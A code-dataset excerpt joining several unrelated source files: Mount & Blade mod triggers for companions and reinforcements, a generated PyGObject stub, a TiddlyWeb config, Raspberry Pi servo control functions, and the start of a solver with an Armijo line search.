(try_for_range, ":pretender", pretenders_begin, pretenders_end),
(troop_set_slot, ":pretender", slot_troop_cur_center, 0),
(neq, ":pretender", "$supported_pretender"),
(troop_get_slot, ":target_faction", ":pretender", slot_troop_original_faction),
(faction_slot_eq, ":target_faction", slot_faction_state, sfs_active),
(faction_slot_eq, ":target_faction", slot_faction_has_rebellion_chance, 1),
(neg|troop_slot_eq, ":pretender", slot_troop_occupation, slto_kingdom_hero),
(try_for_range, ":unused", 0, 30),
(troop_slot_eq, ":pretender", slot_troop_cur_center, 0),
(store_random_in_range, ":town", towns_begin, towns_end),
(store_faction_of_party, ":town_faction", ":town"),
(store_relation, ":relation", ":town_faction", ":target_faction"),
(le, ":relation", 0), #fail if nothing qualifies
(troop_set_slot, ":pretender", slot_troop_cur_center, ":town"),
(try_begin),
(eq, "$cheat_mode", 1),
(str_store_troop_name, 4, ":pretender"),
(str_store_party_name, 5, ":town"),
(display_message, "@{!}{s4} is in {s5}"),
(try_end),
(try_end),
# (try_for_range, ":rebel_faction", rebel_factions_begin, rebel_factions_end),
# (faction_get_slot, ":rebellion_status", ":rebel_faction", slot_faction_state),
# (eq, ":rebellion_status", sfs_inactive_rebellion),
# (faction_get_slot, ":pretender", ":rebel_faction", slot_faction_leader),
# (faction_get_slot, ":target_faction", ":rebel_faction", slot_faction_rebellion_target),#
# (store_random_in_range, ":town", towns_begin, towns_end),
# (store_faction_of_party, ":town_faction", ":town"),
# (store_relation, ":relation", ":town_faction", ":target_faction"),
# (le, ":relation", 0), #fail if nothing qualifies
# (faction_set_slot, ":rebel_faction", slot_faction_inactive_leader_location, ":town"),
(try_end),
],
[]
),
#Rebellion changes end
#NPC system changes begin
#Move unemployed NPCs around taverns
(24 * 15 , 0, 0,
[
(call_script, "script_update_companion_candidates_in_taverns"),
],
[]
),
#Process morale and determine personality clashes
(0, 0, 24,
[],
[
#Count NPCs in party and get the "grievance divisor", which determines how fast grievances go away
#Set their relation to the player
(assign, ":npcs_in_party", 0),
(assign, ":grievance_divisor", 100),
(try_for_range, ":npc1", companions_begin, companions_end),
(main_party_has_troop, ":npc1"),
(val_add, ":npcs_in_party", 1),
(try_end),
(val_sub, ":grievance_divisor", ":npcs_in_party"),
(store_skill_level, ":persuasion_level", "skl_persuasion", "trp_player"),
(val_add, ":grievance_divisor", ":persuasion_level"),
(assign, reg7, ":grievance_divisor"),
# (display_message, "@{!}Process NPC changes. GD: {reg7}"),
##Activate personality clash from 24 hours ago
(try_begin), #scheduled personality clashes require at least 24hrs together
(gt, "$personality_clash_after_24_hrs", 0),
(eq, "$disable_npc_complaints", 0),
(try_begin),
(troop_get_slot, ":other_npc", "$personality_clash_after_24_hrs", slot_troop_personalityclash_object),
(main_party_has_troop, "$personality_clash_after_24_hrs"),
(main_party_has_troop, ":other_npc"),
(assign, "$npc_with_personality_clash", "$personality_clash_after_24_hrs"),
(try_end),
(assign, "$personality_clash_after_24_hrs", 0),
(try_end),
#
(try_for_range, ":npc", companions_begin, companions_end),
###Reset meeting variables
(troop_set_slot, ":npc", slot_troop_turned_down_twice, 0),
(try_begin),
(troop_slot_eq, ":npc", slot_troop_met, 1),
(troop_set_slot, ":npc", slot_troop_met_previously, 1),
(try_end),
###Check for coming out of retirement
(troop_get_slot, ":occupation", ":npc", slot_troop_occupation),
(try_begin),
(eq, ":occupation", slto_retirement),
(troop_get_slot, ":renown_min", ":npc", slot_troop_return_renown),
(str_store_troop_name, s31, ":npc"),
(troop_get_slot, ":player_renown", "trp_player", slot_troop_renown),
(assign, reg4, ":player_renown"),
(assign, reg5, ":renown_min"),
# (display_message, "@{!}Test {s31} for retirement return {reg4}, {reg5}."),
(gt, ":player_renown", ":renown_min"),
(troop_set_slot, ":npc", slot_troop_personalityclash_penalties, 0),
(troop_set_slot, ":npc", slot_troop_morality_penalties, 0),
(troop_set_slot, ":npc", slot_troop_occupation, 0),
(try_end),
#Check for political issues
(try_begin), #does npc's opponent pipe up?
(troop_slot_ge, ":npc", slot_troop_days_on_mission, 5),
(troop_slot_eq, ":npc", slot_troop_current_mission, npc_mission_kingsupport),
(troop_get_slot, ":other_npc", ":npc", slot_troop_kingsupport_opponent),
(troop_slot_eq, ":other_npc", slot_troop_kingsupport_objection_state, 0),
(troop_set_slot, ":other_npc", slot_troop_kingsupport_objection_state, 1),
(str_store_troop_name, s3, ":npc"),
(str_store_troop_name, s4, ":other_npc"),
(try_begin),
(eq, "$cheat_mode", 1),
(display_message, "str_s4_ready_to_voice_objection_to_s3s_mission_if_in_party"),
(try_end),
(try_end),
#Check for quitting
(try_begin),
(main_party_has_troop, ":npc"),
(call_script, "script_dplmc_npc_morale", ":npc", 0), #SB : just the number
(assign, ":npc_morale", reg0),
(try_begin),
(lt, ":npc_morale", 20),
(store_random_in_range, ":random", 0, 100),
(val_add, ":npc_morale", ":random"),
(lt, ":npc_morale", 20),
(assign, "$npc_is_quitting", ":npc"),
(try_end),
#Reduce grievance over time (or augment, if party is overcrowded
(troop_get_slot, ":grievance", ":npc", slot_troop_personalityclash_penalties),
(val_mul, ":grievance", 90),
(val_div, ":grievance", ":grievance_divisor"),
(troop_set_slot, ":npc", slot_troop_personalityclash_penalties, ":grievance"),
(troop_get_slot, ":grievance", ":npc", slot_troop_morality_penalties),
(val_mul, ":grievance", 90),
(val_div, ":grievance", ":grievance_divisor"),
(troop_set_slot, ":npc", slot_troop_morality_penalties, ":grievance"),
#Change personality grievance levels
(try_begin),
(this_or_next|troop_slot_ge, ":npc", slot_troop_personalityclash_state, 1),
(eq, "$disable_npc_complaints", 1),
(troop_get_slot, ":object", ":npc", slot_troop_personalityclash_object),
(main_party_has_troop, ":object"),
(call_script, "script_reduce_companion_morale_for_clash", ":npc", ":object", slot_troop_personalityclash_state),
(try_end),
(try_begin),
(this_or_next|troop_slot_ge, ":npc", slot_troop_personalityclash2_state, 1),
(eq, "$disable_npc_complaints", 1),
(troop_get_slot, ":object", ":npc", slot_troop_personalityclash2_object),
(main_party_has_troop, ":object"),
(call_script, "script_reduce_companion_morale_for_clash", ":npc", ":object", slot_troop_personalityclash2_state),
(try_end),
(try_begin),
(this_or_next|troop_slot_ge, ":npc", slot_troop_personalitymatch_state, 1),
(eq, "$disable_npc_complaints", 1),
(troop_get_slot, ":object", ":npc", slot_troop_personalitymatch_object),
(main_party_has_troop, ":object"),
(troop_get_slot, ":grievance", ":npc", slot_troop_personalityclash_penalties),
(val_mul, ":grievance", 9),
(val_div, ":grievance", 10),
(troop_set_slot, ":npc", slot_troop_personalityclash_penalties, ":grievance"),
(try_end),
#Check for new personality clashes
#Active personality clash 1 if at least 24 hours have passed
(try_begin),
(eq, "$disable_npc_complaints", 0),
(eq, "$npc_with_personality_clash", 0),
(eq, "$npc_with_personality_clash_2", 0),
(eq, "$personality_clash_after_24_hrs", 0),
(troop_slot_eq, ":npc", slot_troop_personalityclash_state, 0),
(troop_get_slot, ":other_npc", ":npc", slot_troop_personalityclash_object),
(main_party_has_troop, ":other_npc"),
(assign, "$personality_clash_after_24_hrs", ":npc"),
(try_end),
#Personality clash 2 and personality match is triggered by battles
(try_begin),
(eq, "$npc_with_political_grievance", 0),
(troop_slot_eq, ":npc", slot_troop_kingsupport_objection_state, 1),
(assign, "$npc_with_political_grievance", ":npc"),
(try_end),
#main party does not have troop, and the troop is a companion
(else_try),
(neg|main_party_has_troop, ":npc"),
(eq, ":occupation", slto_player_companion),
(troop_get_slot, ":days_on_mission", ":npc", slot_troop_days_on_mission),
(try_begin), #debug
(eq, "$cheat_mode", 1),
(str_store_troop_name, s10, ":npc"),
(assign, reg0, ":days_on_mission"),
(display_message, "@Checking rejoin of {s10} days on mission: {reg0}"),
(try_end),
(try_begin),
(gt, ":days_on_mission", 0),
(val_sub, ":days_on_mission", 1),
(troop_set_slot, ":npc", slot_troop_days_on_mission, ":days_on_mission"),
##diplomacy begin
(else_try),
(this_or_next|troop_slot_eq, ":npc", slot_troop_current_mission, dplmc_npc_mission_spy_request), #spy mission
(troop_slot_eq, ":npc", slot_troop_current_mission, dplmc_npc_mission_rescue_prisoner), #SB : escue mission
(troop_slot_ge, ":npc", dplmc_slot_troop_mission_diplomacy, 1), #caught
(try_begin), #use hired blade for spy
(troop_slot_eq, ":npc", slot_troop_current_mission, dplmc_npc_mission_spy_request),
(troop_set_slot, "trp_hired_blade", slot_troop_mission_object, ":npc"),
(assign, "$npc_to_rejoin_party", "trp_hired_blade"),
(else_try), #use town walker
(troop_slot_eq, ":npc", slot_troop_current_mission, dplmc_npc_mission_rescue_prisoner),
(troop_get_slot, ":town_no", ":npc", slot_troop_town_with_contacts),
(store_random_in_range, ":slot_no", slot_center_walker_0_troop, slot_center_walker_0_troop + num_town_walkers),
(party_get_slot, ":walker_no", ":town_no", ":slot_no"),
(troop_set_slot, ":walker_no", slot_troop_mission_object, ":npc"),
(assign, "$npc_to_rejoin_party", ":walker_no"),
(try_end),
##diplomacy end
(else_try),
(troop_slot_ge, ":npc", slot_troop_current_mission, 1),
#If the hero can join
(this_or_next|neg|troop_slot_eq, ":npc", slot_troop_current_mission, npc_mission_rejoin_when_possible),
(hero_can_join, ":npc"),
(assign, "$npc_to_rejoin_party", ":npc"),
(try_end),
(try_end),
(try_end),
]),
#NPC system changes end
#SB : change interval
# Lady of the lake achievement
(12, 0, 0,
[
# (troop_get_type, ":is_female", "trp_player"),
(eq, "$character_gender", tf_female),
],
[
(assign, ":inv_cap", companions_end),
(try_for_range, ":companion", companions_begin, ":inv_cap"),
(troop_slot_eq, ":companion", slot_troop_occupation, slto_player_companion),
# (troop_get_inventory_capacity, ":inv_cap", ":companion"),
(try_for_range, ":i_slot", 0, ek_head),
(troop_get_inventory_slot, ":item_id", ":companion", ":i_slot"),
(ge, ":item_id", 0),
(this_or_next|eq, ":item_id", "itm_great_sword"),
(this_or_next|eq, ":item_id", "itm_sword_two_handed_a"),
(eq, ":item_id", "itm_strange_great_sword"),
(unlock_achievement, ACHIEVEMENT_LADY_OF_THE_LAKE),
(assign, ":inv_cap", 0),
(try_end),
(try_end),
]
),
##diplomacy begin
# Appoint chamberlain
(24 , 0, 24 * 12,
[],
[
(assign, ":has_fief", 0),
(try_for_range, ":center_no", centers_begin, centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", slot_town_lord),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
(try_begin), #debug
(eq, "$cheat_mode", 1),
(assign, reg0, "$g_player_chamberlain"),
(display_message, "@{!}DEBUG : chamberlain: {reg0}"),
(try_end),
(assign, ":notification", 0),
(try_begin),
(eq, "$g_player_chamberlain", 0),
(assign, ":notification", 1),
(else_try),
(neq, "$g_player_chamberlain", -1),
(neq, "$g_player_chamberlain", "trp_dplmc_chamberlain"),
(assign, ":notification", 1),
(try_end),
(try_begin),
(eq, ":notification", 1),
(call_script, "script_add_notification_menu", "mnu_dplmc_notification_appoint_chamberlain", 0, 0),
(try_end),]
),
# Appoint constable
(24 , 0, 24 * 13,
[],
[
(assign, ":has_fief", 0),
(try_for_range, ":center_no", walled_centers_begin, walled_centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", slot_town_lord),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
(try_begin), #debug
(eq, "$cheat_mode", 1),
(assign, reg0, "$g_player_constable"),
(display_message, "@{!}DEBUG : constable: {reg0}"),
(try_end),
(assign, ":notification", 0),
(try_begin),
(eq, "$g_player_constable", 0),
(assign, ":notification", 1),
(else_try),
(neq, "$g_player_constable", -1),
(neq, "$g_player_constable", "trp_dplmc_constable"),
(assign, ":notification", 1),
(try_end),
(try_begin),
(eq, ":notification", 1),
(call_script, "script_add_notification_menu", "mnu_dplmc_notification_appoint_constable", 0, 0),
(try_end),
]
),
# Appoint chancellor
(24 , 0, 24 * 14,
[],
[
(assign, ":has_fief", 0),
(try_for_range, ":center_no", towns_begin, towns_end),
(party_get_slot, ":lord_troop_id", ":center_no", slot_town_lord),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
(try_begin), #debug
(eq, "$cheat_mode", 1),
(assign, reg0, "$g_player_chancellor"),
(display_message, "@{!}DEBUG : chancellor: {reg0}"),
(try_end),
(assign, ":notification", 0),
(try_begin),
(eq, "$g_player_chancellor", 0),
(assign, ":notification", 1),
(else_try),
(neq, "$g_player_chancellor", -1),
(neq, "$g_player_chancellor", "trp_dplmc_chancellor"),
(assign, ":notification", 1),
(try_end),
(try_begin),
(eq, ":notification", 1),
(call_script, "script_add_notification_menu", "mnu_dplmc_notification_appoint_chancellor", 0, 0),
(try_end),
]),
#initialize autoloot feature if you have a chamberlain
##diplomacy start+
#Disable this: autoloot gets initialized elsewhere.
(24, 0, ti_once,
[
##NEW:
(eq, 0, 1),
##OLD:
#(store_skill_level, ":inv_skill", "skl_inventory_management", "trp_player"),
#(gt, "$g_player_chamberlain", 0),
#(ge, ":inv_skill", 3),
],
[
##NEW:
#This doesn't ever get called, but if it did here's what should happen"
(call_script, "script_dplmc_initialize_autoloot", 1),#argument "1" forces this to make changes
##OLD:
#(call_script, "script_dplmc_init_item_difficulties"),
#(call_script, "script_dplmc_init_item_base_score"),
#(assign, "$g_autoloot", 1),
]),
(0.1, 0.5, 0, [(map_free,0),(eq,"$g_move_fast", 1)], [(assign,"$g_move_fast", 0)]),
##diplomacy end
#Zaitenko's Reinforcement Script
(36, 0, 0.0, [], [ ## Set the reinforcements interval to 36 Game hours. Change as you feel like.
(try_for_range, ":center", walled_centers_begin, walled_centers_end),
(store_faction_of_party, ":faction", ":center"),
(party_get_num_companions, ":garrison", ":center"),
(faction_get_slot, ":party_template_a", ":faction", slot_faction_reinforcements_a),
(faction_get_slot, ":party_template_b", ":faction", slot_faction_reinforcements_b),
(faction_get_slot, ":party_template_c", ":faction", slot_faction_reinforcements_c),
(assign, ":party_template", 0),
(try_begin),
(party_slot_eq, ":center", slot_party_type, spt_town),
(lt, ":garrison", 200), ## Under this number of troops will towns get reinforcements
(assign, ":party_template", "pt_reinforcements"),
(else_try),
(party_slot_eq, ":center", slot_party_type, spt_castle),
(lt, ":garrison", 70), ## Under this number of troops will castles get reinforcements
(assign, ":party_template", "pt_reinforcements"),
(try_end),
(try_begin),
(gt, ":party_template", 0),
(try_for_range, ":village_reinforcements", villages_begin, villages_end),
(try_begin),
(party_slot_eq, ":center", slot_party_type, spt_castle), ## For Castles
(party_slot_eq, ":village_reinforcements", slot_village_bound_center, ":center"),
(party_slot_eq, ":village_reinforcements", slot_village_state, svs_normal), ## Not if the village is being raided or is looted
(spawn_around_party, ":village_reinforcements", ":party_template"),
(assign, ":result", reg0),
(store_random_in_range, ":rand", 0, 100),
(try_begin),
(is_between, ":rand", 0, 45), ## Get weakest template
(party_add_template, ":result", ":party_template_a"),
(else_try),
(is_between, ":rand", 45, 85), ## Get stronger template
(party_add_template, ":result", ":party_template_b"),
(else_try),
(ge, ":rand", 85), ## Get strongest template
(party_add_template, ":result", ":party_template_c"),
(try_end),
(party_set_faction, ":result", ":faction"),
(party_set_slot, ":result", slot_party_type, spt_reinforcement_party),
(party_set_slot, ":result", slot_party_ai_object, ":center"),
(str_store_party_name, s14, ":village_reinforcements"),
(party_set_name, ":result", "@Reinforcements from {s14}"),
(party_set_ai_behavior,":result",ai_bhvr_travel_to_party),
(party_set_ai_object,":result", ":center"),
(party_set_flags, ":result", pf_default_behavior, 1),
(else_try),
(party_slot_eq, ":center", slot_party_type, spt_town), ## For Towns
(party_slot_eq, ":village_reinforcements", slot_village_bound_center, ":center"),
(party_slot_eq, ":village_reinforcements", slot_village_state, svs_normal), ## Not if the village is being raided or is looted
(neg|party_slot_eq, ":center", slot_town_lord, "trp_player"), ## Not a player owned center
(spawn_around_party, ":village_reinforcements", ":party_template"),
(assign, ":result", reg0),
(store_random_in_range, ":rand", 0, 100),
(try_begin),
(is_between, ":rand", 0, 45), ## Get weakest template
(party_add_template, ":result", ":party_template_a"),
(else_try),
(is_between, ":rand", 40, 85), ## Get stronger template
(party_add_template, ":result", ":party_template_b"),
(else_try),
(ge, ":rand", 85), ## Get strongest template
(party_add_template, ":result", ":party_template_c"),
(try_end),
(party_set_faction, ":result", ":faction"),
(party_set_slot, ":result", slot_party_type, spt_reinforcement_party),
(party_set_slot, ":result", slot_party_ai_object, ":center"),
(str_store_party_name, s14, ":village_reinforcements"),
(party_set_name, ":result", "@Reinforcements from {s14}"),
(party_set_ai_behavior,":result",ai_bhvr_travel_to_party),
(party_set_ai_object,":result", ":center"),
(party_set_flags, ":result", pf_default_behavior, 1),
(try_end),
(try_end),
(try_end),
(try_end)])
]
# modmerger_start version=201 type=2
try:
component_name = "triggers"
var_set = { "triggers" : triggers }
from modmerger import modmerge
modmerge(var_set)
except:
raise
# modmerger_end
| [
"lily.metaxas@gmail.com"
] | lily.metaxas@gmail.com |
66e0c84a835d00f66e63f4eabefe603562658452 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/EBackend/CollectionBackendClass.py | 9bef82e9cc16e52ae4c3acc39b19c2255df0443e | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 6,476 | py | # encoding: utf-8
# module gi.repository.EBackend
# from /usr/lib64/girepository-1.0/EBackend-1.2.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.EDataServer as __gi_repository_EDataServer
import gi.repository.Gio as __gi_repository_Gio
import gobject as __gobject
class CollectionBackendClass(__gi.Struct):
"""
:Constructors:
::
CollectionBackendClass()
"""
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
child_added = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
child_removed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource_finish = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource_sync = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource_finish = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource_sync = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
dup_resource_id = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
parent_class = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
populate = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
reserved = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(CollectionBackendClass), '__module__': 'gi.repository.EBackend', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'CollectionBackendClass' objects>, '__weakref__': <attribute '__weakref__' of 'CollectionBackendClass' objects>, '__doc__': None, 'parent_class': <property object at 0x7f9dc2d881d0>, 'populate': <property object at 0x7f9dc2d882c0>, 'dup_resource_id': <property object at 0x7f9dc2d883b0>, 'child_added': <property object at 0x7f9dc2d884a0>, 'child_removed': <property object at 0x7f9dc2d88590>, 'create_resource_sync': <property object at 0x7f9dc2d886d0>, 'create_resource': <property object at 0x7f9dc2d88770>, 'create_resource_finish': <property object at 0x7f9dc2d888b0>, 'delete_resource_sync': <property object at 0x7f9dc2d889a0>, 'delete_resource': <property object at 0x7f9dc2d88a40>, 'delete_resource_finish': <property object at 0x7f9dc2d88b80>, 'reserved': <property object at 0x7f9dc2d88c20>})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(CollectionBackendClass)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
4ab6db4ddd15683d5486a6ce5d4a368545640938 | 4a1ce8dc34b771334867fc8f3eacf9eb140c7a15 | /contributors/ChrisDent/verticals/UnaForms/uf/tiddlywebconfig.py | 60e4c4e51b404a2059c5c1f646e909fabd4ca5fc | [] | no_license | dineshkummarc/tiddlywiki-svn-mirror | 4bbfbd22ba150f90543b983b3875dd30ad8abe4e | e1d4198d99f143d4a836d42e6c9b88891f2b6798 | refs/heads/master | 2021-01-20T01:25:05.375480 | 2010-12-08T16:12:00 | 2010-12-08T16:12:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 859 | py | config = {
'system_plugins': ['former', 'logout'],
'twanager_plugins': ['former', 'lister'],
'instance_tiddlers': [
('system', [
'http://svn.tiddlywiki.org/Trunk/association/adaptors/TiddlyWebAdaptor.js',
'http://svn.tiddlywiki.org/Trunk/association/plugins/ServerSideSavingPlugin.js',
'http://svn.tiddlywiki.org/Trunk/association/plugins/TiddlyWebConfig.js',
'http://svn.tiddlywiki.org/Trunk/contributors/SaqImtiaz/verticals/unaforms/unaformsSetDefaultBagPlugin.js'
]),
('formtools', [
'http://svn.tiddlywiki.org/Trunk/contributors/SaqImtiaz/verticals/InputExForms/inputEx-subrecipe.recipe',
])
],
'log_level': 'DEBUG',
'css_uri': 'http://peermore.com/tiddlyweb.css',
}
| [
"cdent@bb0f57cd-c710-0410-a8fb-e8bc1be0d679"
] | cdent@bb0f57cd-c710-0410-a8fb-e8bc1be0d679 |
d9db690c91fc2ddc09d2c0a1a3de68d70af49ae3 | c608832b2e4c731722d43d5fc579a56634bcc219 | /GUI/servomodule.py | b22a01c7a2863bd87778dfec57522e6faaad11b7 | [] | no_license | neiltarar/GUI-Controlled-Self-Driving-Robot-Car-Project | 09277109a466e36d2e6707cbdb5d16ac5e4b3e56 | c133145eb33c4846e33230a7e75441b3782bcaab | refs/heads/master | 2023-06-24T07:32:59.390109 | 2023-06-11T08:51:30 | 2023-06-11T08:51:30 | 247,864,115 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,682 | py | # servomodule.py
import RPi.GPIO as GPIO
import time
def servo_down():
servoPIN_1 = 18
servoPIN_2 = 4
GPIO.setmode(GPIO.BCM)
GPIO.setup(servoPIN_1, GPIO.OUT)
GPIO.setup(servoPIN_2, GPIO.OUT)
p_1 = GPIO.PWM(servoPIN_1, 50) # GPIO 18 for PWM with 50Hz
p_1.start(6) #Initialisation
p_2 = GPIO.PWM(servoPIN_2, 50)
p_2.start(5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
if True:
p_2.ChangeDutyCycle(8)
time.sleep(0.5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
def servo_up():
servoPIN_1 = 18
servoPIN_2 = 4
GPIO.setmode(GPIO.BCM)
GPIO.setup(servoPIN_1, GPIO.OUT)
GPIO.setup(servoPIN_2, GPIO.OUT)
p_1 = GPIO.PWM(servoPIN_1, 50) # GPIO 18 for PWM with 50Hz
p_1.start(6) #Initialisation
p_2 = GPIO.PWM(servoPIN_2, 50)
p_2.start(5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
if True:
p_2.ChangeDutyCycle(3.5)
time.sleep(0.5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
def servo_centre():
servoPIN_1 = 18
servoPIN_2 = 4
GPIO.setmode(GPIO.BCM)
GPIO.setup(servoPIN_1, GPIO.OUT)
GPIO.setup(servoPIN_2, GPIO.OUT)
p_1 = GPIO.PWM(servoPIN_1, 50) # GPIO 18 for PWM with 50Hz
p_1.start(6) #Initialisation
p_2 = GPIO.PWM(servoPIN_2, 50)
p_2.start(5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
if True:
p_1.ChangeDutyCycle(6)
p_2.ChangeDutyCycle(5)
time.sleep(0.5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
def servo_right_turn():
servoPIN_1 = 18
servoPIN_2 = 4
GPIO.setmode(GPIO.BCM)
GPIO.setup(servoPIN_1, GPIO.OUT)
GPIO.setup(servoPIN_2, GPIO.OUT)
p_1 = GPIO.PWM(servoPIN_1, 50) # GPIO 18 for PWM with 50Hz
p_1.start(6) #Initialisation
p_2 = GPIO.PWM(servoPIN_2, 50)
p_2.start(5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
if True:
p_1.ChangeDutyCycle(2)
time.sleep(0.5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
def servo_left_turn():
servoPIN_1 = 18
servoPIN_2 = 4
GPIO.setmode(GPIO.BCM)
GPIO.setup(servoPIN_1, GPIO.OUT)
GPIO.setup(servoPIN_2, GPIO.OUT)
p_1 = GPIO.PWM(servoPIN_1, 50) # GPIO 18 for PWM with 50Hz
p_1.start(6) #Initialisation
p_2 = GPIO.PWM(servoPIN_2, 50)
p_2.start(5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
if True:
p_1.ChangeDutyCycle(10)
time.sleep(0.5)
p_1.ChangeDutyCycle(0)
p_2.ChangeDutyCycle(0)
| [
"noreply@github.com"
] | neiltarar.noreply@github.com |
285edea7dbbb66cd9e8bcc73dcb3e942f5c9406d | b7526d2cd24326f5b1133971e984b38d05855969 | /modules/solvers.py | 56b42105ea5953ffcc8ec89d28cf3c979efd8811 | [] | no_license | WCZ93762/ImpSq | 0515918f9eec816f3e1b481f7723a2e6ee254369 | bd490e95596608b351c73a6513db557ce94a09f0 | refs/heads/main | 2023-09-02T18:15:15.473544 | 2021-11-24T19:53:37 | 2021-11-24T19:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,679 | py | import torch
import torch
from torch import nn
import torch.nn.functional as functional
from torch.autograd import Function
from torch import autograd
import numpy as np
import pickle
import sys
import os
from scipy.optimize import root
import time
def _safe_norm(v):
if not torch.isfinite(v).all():
return np.inf
return torch.norm(v)
def scalar_search_armijo(phi, phi0, derphi0, c1=1e-4, alpha0=1, amin=0):
ite = 0
phi_a0 = phi(alpha0) # First do an update with step size 1
if phi_a0 <= phi0 + c1*alpha0*derphi0:
return alpha0, phi_a0, ite
# Otherwise, compute the minimizer of a quadratic interpolant
alpha1 = -(derphi0) * alpha0**2 / 2.0 / (phi_a0 - phi0 - derphi0 * alpha0)
phi_a1 = phi(alpha1)
# Otherwise loop with cubic interpolation until we find an alpha which
# satisfies the first Wolfe condition (since we are backtracking, we will
# assume that the value of alpha is not too small and satisfies the second
# condition.
while alpha1 > amin: # we are assuming alpha>0 is a descent direction
factor = alpha0**2 * alpha1**2 * (alpha1-alpha0)
a = alpha0**2 * (phi_a1 - phi0 - derphi0*alpha1) - \
alpha1**2 * (phi_a0 - phi0 - derphi0*alpha0)
a = a / factor
b = -alpha0**3 * (phi_a1 - phi0 - derphi0*alpha1) + \
alpha1**3 * (phi_a0 - phi0 - derphi0*alpha0)
b = b / factor
alpha2 = (-b + torch.sqrt(torch.abs(b**2 - 3 * a * derphi0))) / (3.0*a)
phi_a2 = phi(alpha2)
ite += 1
if (phi_a2 <= phi0 + c1*alpha2*derphi0):
return alpha2, phi_a2, ite
if (alpha1 - alpha2) > alpha1 / 2.0 or (1 - alpha2/alpha1) < 0.96:
alpha2 = alpha1 / 2.0
alpha0 = alpha1
alpha1 = alpha2
phi_a0 = phi_a1
phi_a1 = phi_a2
# Failed to find a suitable step length
return None, phi_a1, ite
